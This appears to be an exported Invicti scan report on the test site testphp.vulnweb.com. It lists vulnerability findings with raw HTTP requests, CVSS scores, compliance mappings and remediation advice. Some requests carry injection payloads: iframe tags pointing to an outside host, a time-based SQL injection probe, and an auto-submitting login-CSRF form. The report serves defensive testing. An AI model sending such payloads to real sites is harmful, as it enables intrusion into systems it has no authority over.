Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | p | Querystring | valid |
| GET | pp | Querystring | <iframe src="http://r87.com/?"></iframe> |
| GET | aaaa%2f | Querystring |
GET /hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | artist | Querystring | <iframe src="http://r87.com/?"></iframe> |
GET /listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | cat | Querystring | <iframe src="http://r87.com/?"></iframe> |
GET /listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | file | Querystring | <iframe src="http://r87.com/?"></iframe> |
| GET | size | Querystring | 160 |
GET /showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| PCI DSS v3.2 | 6.5.1 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A1 |
| OWASP 2017 | A1 |
| CWE | 601 |
| WASC | 38 |
| HIPAA | 164.308(a) |
| ASVS 4.0 | 5.3.1 |
| NIST SP 800-53 | SI-10 |
| DISA STIG | V-6164 |
| ISO27001 | A.14.2.5 |
| ISO27001 2022 | A.8.26 |
| ISO27001 2022 | A.8.27 |
| ISO27001 2022 | A.8.28 |
| OWASP Top Ten 2021 | A03 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 4.7 (Medium) |
| Temporal | 4.7 (Medium) |
| Environmental | 4.7 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 4.7 (Medium) |
| Temporal | 4.7 (Medium) |
| Environmental | 4.7 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N |
CVSS 4.0 Score | |
|---|---|
| 5.1 / Medium | |
| Exploitability | Medium |
| Complexity | High |
| Vulnerable system | Low |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | Medium |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N |
Invicti Standard detected JetBrains .idea project directory.
The .idea directory contains a set of configuration files (.xml) for your project. These configuration files contain information core to the project itself, such as names and locations of its component modules, compiler settings, etc. If you've defined a data source the file dataSources.ids contains information for connecting to the database and credentials. The workspace.xml file stores personal settings such as placement and positions of your windows, your VCS and History settings, and other data pertaining to the development environment. It also contains a list of changed files and other sensitive information. These files should not be present on a production system.
.idea project directory contains sensitive information about the project. This information might help an attacker to compromise the system.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | URI-BASED | FullUrl | /.idea/workspace.xml |
GET /.idea/workspace.xml HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Remove these files from production systems or restrict access to the .idea directory. To deny access to all the .idea folders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from .htaccess):
Order allow,deny
Deny from all
| OWASP 2013 | A5 |
|---|---|
| OWASP 2017 | A6 |
| CWE | 538 |
| CAPEC | 118 |
| WASC | 13 |
| ASVS 4.0 | 12.5.1 |
| NIST SP 800-53 | SC-4 |
| DISA STIG | V-16814 |
| OWASP Top Ten 2021 | A05 |
| OWASP API Top 10 2023 | API3 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 5.8 (Medium) |
| Temporal | 5.8 (Medium) |
| Environmental | 5.8 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 5.8 (Medium) |
| Temporal | 5.8 (Medium) |
| Environmental | 5.8 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
Invicti Standard detected an Open Policy Crossdomain.xmlfile.
GET /crossdomain.xml HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| OWASP 2013 | A5 |
|---|---|
| OWASP 2017 | A6 |
| CWE | 16 |
| WASC | 15 |
| ASVS 4.0 | 14.5.2 |
| NIST SP 800-53 | AC-22 |
| DISA STIG | V-6141 |
| OWASP API Top Ten 2019 | API7 |
| ISO27001 | A.14.2.5 |
| ISO27001 2022 | A.5.14 |
| OWASP Top Ten 2021 | A05 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 6.5 (Medium) |
| Temporal | 6.2 (Medium) |
| Environmental | 6.2 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C |
CVSS 3.1 SCORE | |
|---|---|
| Base | 6.5 (Medium) |
| Temporal | 6.2 (Medium) |
| Environmental | 6.2 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C |
Invicti Standard identified the target web site is using tinymce and detected that it is out of date.
tinymce 4.7.11, 4.7.12 is affected by: CWE-79: Improper Neutralization of Input During Web Page Generation. The impact is: JavaScript code execution. The component is: Media element. The attack vector is: The victim must paste malicious content to media element's embed tab.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
A cross-site scripting (XSS) vulnerability in TinyMCE 5.2.1 and earlier allows remote attackers to inject arbitrary web script when configured in classic editing mode.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
tinymce is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in the alert and confirm dialogs when these dialogs were provided with malicious HTML content. This can occur in plugins that use the alert or confirm dialogs, such as in the `image` plugin, which presents these dialogs when certain errors occur. The vulnerability allowed arbitrary JavaScript execution when an alert presented in the TinyMCE UI for the current user. This vulnerability has been patched in TinyMCE 5.10.7 and TinyMCE 6.3.1 by ensuring HTML sanitization was still performed after unwrapping invalid elements. Users are advised to upgrade to either 5.10.7 or 6.3.1. Users unable to upgrade may ensure the the `images_upload_handler` returns a valid value as per the images_upload_handler documentation.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
TinyMCE is an open source rich text editor. A mutation cross-site scripting (mXSS) vulnerability was discovered in TinyMCE’s core undo and redo functionality. When a carefully-crafted HTML snippet passes the XSS sanitisation layer, it is manipulated as a string by internal trimming functions before being stored in the undo stack. If the HTML snippet is restored from the undo stack, the combination of the string manipulation and reparative parsing by either the browser's native [DOMParser API](https://developer.mozilla.org/en-US/docs/Web/API/DOMParser) (TinyMCE 6) or the SaxParser API (TinyMCE 5) mutates the HTML maliciously, allowing an XSS payload to be executed. This vulnerability has been patched in TinyMCE 5.10.8 and TinyMCE 6.7.1 by ensuring HTML is trimmed using node-level manipulation instead of string manipulation. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s Notification Manager API. The vulnerability exploits TinyMCE's unfiltered notification system, which is used in error handling. The conditions for this exploit requires carefully crafted malicious content to have been inserted into the editor and a notification to have been triggered. When a notification was opened, the HTML within the text argument was displayed unfiltered in the notification. The vulnerability allowed arbitrary JavaScript execution when an notification presented in the TinyMCE UI for the current user. This issue could also be exploited by any integration which uses a TinyMCE notification to display unfiltered HTML content. This vulnerability has been patched in TinyMCE 5.10.8 and TinyMCE 6.7.1 by ensuring that the HTML displayed in the notification is sanitized, preventing the exploit. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
TinyMCE is an open source rich text editor. A mutation cross-site scripting (mXSS) vulnerability was discovered in TinyMCE’s core undo/redo functionality and other APIs and plugins. Text nodes within specific parents are not escaped upon serialization according to the HTML standard. If such text nodes contain a special character reserved as an internal marker, they can be combined with other HTML patterns to form malicious snippets. These snippets pass the initial sanitisation layer when the content is parsed into the editor body, but can trigger XSS when the special internal marker is removed from the content and re-parsed. his vulnerability has been patched in TinyMCE versions 6.7.3 and 5.10.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard detected that the session.use_only_cookiesPHP directive is disabled.
The session.use_only_cookiesPHP directive makes PHP send session IDs exclusively in cookies, as opposed to appending them to the URL. While passing the session ID in the URL may have the perceived security benefit of preventing Cross-site Request Forgery (CSRF) vulnerabilities, it actually leads to dangerous session related vulnerabilities, such as session hijacking and session fixation. Session IDs may end up in log files or can be leaked via the Referer header or by other means. Additionally attackers can trick victims into logging into their own account.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | URI-BASED | FullUrl | phpinfo.php |
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
You can enable session.use_only_cookiesfrom php.ini or .htaccess.
session.use_only_cookies = 'on'php_flag session.use_only_cookies onIn order to prevent session IDs from being passed in the URL, enable session.use_only_cookies in your php.ini or .htaccess file.
| OWASP 2013 | A5 |
|---|---|
| OWASP 2017 | A6 |
| CWE | 598 |
| ASVS 4.0 | 3.1.1 |
| NIST SP 800-53 | CM-6 |
| DISA STIG | V-16786 |
| OWASP API Top Ten 2019 | API7 |
| ISO27001 2022 | A.8.9 |
| OWASP Top Ten 2021 | A05 |
| OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 8.1 (High) |
| Temporal | 8.1 (High) |
| Environmental | 8.1 (High) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 8.1 (High) |
| Temporal | 8.1 (High) |
| Environmental | 8.1 (High) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
CVSS 4.0 Score | |
|---|---|
| 5.1 / Medium | |
| Exploitability | Medium |
| Complexity | High |
| Vulnerable system | Low |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | Medium |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N |
Invicti Standard detected that SSL/TLS is not implemented after trying to establish a secure connection to the target website.
An attacker who is able to intercept your - or your users' - network traffic can read and modify any messages that are exchanged with your server.
That means that an attacker can see passwords in clear text, modify the appearance of your website, redirect the user to other web pages or steal session information.
Therefore no message you send to the server remains confidential.
[SSL Connection]
We suggest that you implement SSL/TLS properly, for example by using the Certbot tool provided by the Let's Encrypt certificate authority. It can automatically configure most modern web servers, e.g. Apache and Nginx to use SSL/TLS. Both the tool and the certificates are free and are usually installed within minutes.
| PCI DSS v3.2 | 6.5.4 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A6 |
| OWASP 2017 | A3 |
| CWE | 311 |
| CAPEC | 217 |
| WASC | 4 |
| HIPAA | 164.306 |
| ASVS 4.0 | 9.1.1 |
| NIST SP 800-53 | SC-8 |
| DISA STIG | V-6136 |
| OWASP API Top Ten 2019 | API7 |
| ISO27001 | A.14.1.3 |
| ISO27001 2022 | A.5.14 |
| ISO27001 2022 | A.8.27 |
| OWASP Top Ten 2021 | A02 |
| OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 6.8 (Medium) |
| Temporal | 6.1 (Medium) |
| Environmental | 6.1 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C |
CVSS 3.1 SCORE | |
|---|---|
| Base | 6.8 (Medium) |
| Temporal | 6.1 (Medium) |
| Environmental | 6.1 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C |
CVSS 4.0 Score | |
|---|---|
| 5.1 / Medium | |
| Exploitability | Medium |
| Complexity | High |
| Vulnerable system | Low |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | Medium |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N |
Invicti Standard identified a possible Cross-Site Request Forgery.
CSRF is a very common vulnerability. It's an attack which forces a user to execute unwanted actions on a web application in which the user is currently authenticated.
GET /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
xhr = new XMLHttpRequest();
xhr.setRequestHeader('custom-header', 'valueNULL');
For JQuery, if you want to add a custom header (or set of headers) to
a. individual request
$.ajax({
url: 'foo/bar',
headers: { 'x-my-custom-header': 'some value' }
});
b. every request
$.ajaxSetup({
headers: { 'x-my-custom-header': 'some value' }
});
OR
$.ajaxSetup({
beforeSend: function(xhr) {
xhr.setRequestHeader('x-my-custom-header', 'some value');
}
});
Invicti Standard identified a possible Cross-Site Request Forgery in Login Form.
In a login CSRF attack, the attacker forges a login request to an honest site using the attacker’s user name and password at that site. If the forgery succeeds, the honest server responds with a Set-Cookie header that instructs the browser to mutate its state by storing a session cookie, logging the user into the honest site as the attacker. This session cookie is used to bind subsequent requests to the user’s session and hence to the attacker’s authentication credentials. The attacker can later log into the site with his legitimate credentials and view private information like activity history that has been saved in the account.
In this particular case CSRF affects the login form in which the impact of this vulnerability is decreased significantly. Unlike normal CSRF vulnerabilities this will only allow an attacker to exploit some complex XSS vulnerabilities otherwise it can't be exploited.
For example;
If there is a page that's different for every user (such as "edit my profile") and vulnerable to XSS (Cross-site Scripting) then normally it cannot be exploited. However if the login form is vulnerable, an attacker can prepare a special profile, force victim to login as that user which will trigger the XSS exploit. Again attacker is still quite limited with this XSS as there is no active session. However the attacker can leverage this XSS in many ways such as showing the same login form again but this time capturing and sending the entered username/password to the attacker.
In this kind of attack, attacker will send a link containing html as simple as the following in which attacker's user name and password is attached.
<form method="POST" action="http://honest.site/login">
<input type="text" name="user" value="h4ck3r" />
<input type="password" name="pass" value="passw0rd" />
</form>
<script>
document.forms[0].submit();
</script>
When the victim clicks the link then form will be submitted automatically to the honest site and exploitation is successful, victim will be logged in as the attacker and consequences will depend on the website behavior.
Many sites allow their users to opt-in to saving their search history and provide an interface for a user to review his or her personal search history. Search queries contain sensitive details about the user’s interests and activities and could be used by the attacker to embarrass the user, to steal the user’s identity, or to spy on the user. Since the victim logs in as the attacker, the victim's search queries are then stored in the attacker’s search history, and the attacker can retrieve the queries by logging into his or her own account.
Merchant sites might save the credit card details in user's profile. In login CSRF attack, when user funds a purchase and enrolls the credit card, the credit card details might be added to the attacker's account.
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
xhr = new XMLHttpRequest();
xhr.setRequestHeader('custom-header', 'valueNULL);
For JQuery, if you want to add a custom header (or set of headers) to
a. individual request
$.ajax({
url: 'foo/bar',
headers: { 'x-my-custom-header': 'some value' }
});
b. every request
$.ajaxSetup({
headers: { 'x-my-custom-header': 'some value' }
});
OR
$.ajaxSetup({
beforeSend: function(xhr) {
xhr.setRequestHeader('x-my-custom-header', 'some value');
}
});
Invicti Standard detected that the target web application reflected a piece of content starting from the first byte of the response. This might cause security issues such as Rosetta Stone Attack.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | p | Querystring | N3tSp4rK3R |
| GET | pp | Querystring | 12 |
| GET | aaaa%2f | Querystring |
GET /hpp/params.php?aaaa%2f=&p=N3tSp4rK3R&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Content-Dispositionheader with filenameattribute can be returned to mitigate a possible attack:Content-Disposition: attachment; filename=f.txt
Invicti Standard identified a Possible Internal IP Address Disclosure in the page.
It was not determined if the IP address was that of the system itself or that of an internal network.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | URI-BASED | FullUrl | phpinfo.php |
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified possible phishing by navigating browser tabs but was unable to confirm the vulnerability.
Open windows with normal hrefs with the tag target="_blank"can modify window.opener.locationand replace the parent webpage with something else, even on a different origin.
While this vulnerability doesn't allow script execution, it does allow phishing attacks that silently replace the parent tab. If the links lack rel="noopener noreferrer"attribute, a third party site can change the URL of the source tab using window.opener.location.assignand trick the users into thinking that they’re still in a trusted page and lead them to enter their sensitive data on the malicious website.
GET /disclaimer.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
rel=noopenerto the linksto prevent pages from abusing window.opener. This ensures that the page cannot access the window.openerproperty in Chrome and Opera browsers.rel=noreferrerwhich additionally disables the Referer header.<a href="..." target="_blank" rel="noopener noreferrer">...</a>Invicti Standard identified a cookie not marked as HTTPOnly.
HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.
GET /AJAX/ HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified a database error message disclosure.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | test | Querystring | ' WAITFOR DELAY '0:0:25'-- /* 4ba992a8-9bcd-4b9a-bbee-8b7a829e2e38 */ |
GET /search.php?test=%27%20WAITFOR%20DELAY%20%270%3a0%3a25%27--%20%2f*%204ba992a8-9bcd-4b9a-bbee-8b7a829e2e38%20*%2f HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| PCI DSS v3.2 | 6.5.5 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A5 |
| OWASP 2017 | A6 |
| CWE | 210 |
| CAPEC | 118 |
| WASC | 13 |
| HIPAA | 164.306(a) , 164.308(a) |
| ASVS 4.0 | 12.5.1 |
| NIST SP 800-53 | SI-11 |
| DISA STIG | V-6166 |
| OWASP API Top Ten 2019 | API7 |
| ISO27001 | A.18.1.3 |
| ISO27001 2022 | A.8.15 |
| ISO27001 2022 | A.8.9 |
| OWASP Top Ten 2021 | A05 |
| OWASP API Top 10 2023 | API8 |
Invicti Standard detected a missing X-Content-Type-Options header which means that this website could be at risk of a MIME-sniffing attacks.
MIME type sniffing is a standard functionality in browsers to find an appropriate way to render data where the HTTP headers sent by the server are either inconclusive or missing.
This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the intended content type.
The problem arises once a website allows users to upload content which is then published on the web server. If an attacker can carry out XSS (Cross-site Scripting) attack by manipulating the content in a way to be accepted by the web application and rendered as HTML by the browser, it is possible to inject code in e.g. an image file and make the victim execute it by viewing the image.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Add the X-Content-Type-Options header with a value of "nosniff" to inform the browser to trust what the site has sent is the appropriate content-type, and to not attempt "sniffing" the real content-type.
X-Content-Type-Options: nosniff
Invicti Standard identified a phpinfo() output.
phpinfo() is a debug functionality that prints out detailed information on both the system and the PHP configuration.
An attacker can obtain information such as:
This information can help an attacker to gain more information on the system. After gaining detailed information, the attacker can research known vulnerabilities for that system under review. The attacker can also use this information during the exploitation of other vulnerabilities.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | URI-BASED | FullUrl | phpinfo.php |
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified a version disclosure (Nginx) in the target web server's HTTP response.
This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Nginx.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
SERVERheader of its HTTP response:
server_tokens off
Invicti Standard identified a version disclosure (PHP) in the target web server's HTTP response.
This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
SERVERheader of its HTTP response.CSP is an added layer of security that helps to mitigate mainly Cross-site Scripting attacks.
CSP can be enabled instructing the browser with a Content-Security-Policy directive in a response header;
Content-Security-Policy: script-src 'self';or in a meta tag;
<meta http-equiv="Content-Security-Policy" content="script-src 'self';"> In the above example, you can restrict script loading only to the same domain. It will also restrict inline script executions both in the element attributes and the event handlers. There are various directives which you can use by declaring CSP:
When setting the CSP directives, you can also use some CSP keywords:
In addition to CSP keywords, you can also use wildcard or only a scheme when defining whitelist URLs for the points. Wildcard can be used for subdomain and port portions of the URLs:
Content-Security-Policy: script-src https://*.example.com;
Content-Security-Policy: script-src https://example.com:*;
Content-Security-Policy: script-src https:;It is also possible to set a CSP in Report-Only mode instead of forcing it immediately in the migration period. Thus you can see the violations of the CSP policy in the current state of your web site while migrating to CSP:
